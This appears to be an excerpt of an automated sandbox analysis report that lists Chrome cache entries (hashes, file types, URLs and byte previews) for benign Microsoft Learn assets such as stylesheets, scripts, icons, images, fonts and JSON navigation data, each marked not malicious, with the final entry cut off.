SSDEEP:	6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:	875E7F3672FEC41DDB5A2386D2331531
SHA1:	282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:	67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	dropped
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	dropped
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
